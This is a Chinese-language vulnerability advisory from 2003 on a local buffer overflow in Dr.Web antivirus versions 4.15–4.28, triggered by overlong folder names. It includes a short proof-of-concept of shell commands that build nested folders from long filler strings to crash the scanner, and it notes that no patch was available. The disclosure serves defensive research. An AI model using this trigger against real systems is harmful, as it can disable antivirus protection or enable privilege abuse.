Dr.Web病毒扫描器文件夹名本地缓冲区溢出漏洞
发布日期:2003-03-05
更新日期:2003-03-11
受影响系统:SalD Ltd. Dr.Web 4.28
SalD Ltd. Dr.Web 4.27
SalD Ltd. Dr.Web 4.26
SalD Ltd. Dr.Web 4.25
SalD Ltd. Dr.Web 4.22
SalD Ltd. Dr.Web 4.21
SalD Ltd. Dr.Web 4.20
SalD Ltd. Dr.Web 4.17
SalD Ltd. Dr.Web 4.15
描述:
BUGTRAQ ID:
7022
Dr. WEB是一款反病毒扫描程序,可对多种操作系统如Windows 95/98/ME/2000/NT/XP、DOS/386、OS/2、Novell NetWare、Linux、FreeBSD 3.xx及4.xx和Solaris x86下工作。
Dr. WEB对检查的文件夹名缺少正确的缓冲区边界检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以服务进程的权限在系统上执行任意指令。
攻击者可以建立超长的恶意文件夹名来利用这个漏洞,当病毒扫描程序处理这个文件夹时会发生缓冲区溢出,精心构建文件夹名,可能以扫描程序进程权限在系统上执行任意指令。
<*来源:David Fernandez Madrid (
conde0@telefonica.net)
链接:
http://www.securiteam.com/windowsntfocus/5LP041F9FA.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
David Fernandez Madrid (
conde0@telefonica.net)提供了如下测试方法:
建立如下恶意文件夹名,但反病毒软件扫描时可发生缓冲区溢出:
set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB
mkdir /$a
mkdir /$a/$b
或:
SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%B%
建议:
厂商补丁:
SalD Ltd.
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sald.com浏览次数:2945
严重程度:0(网友投票)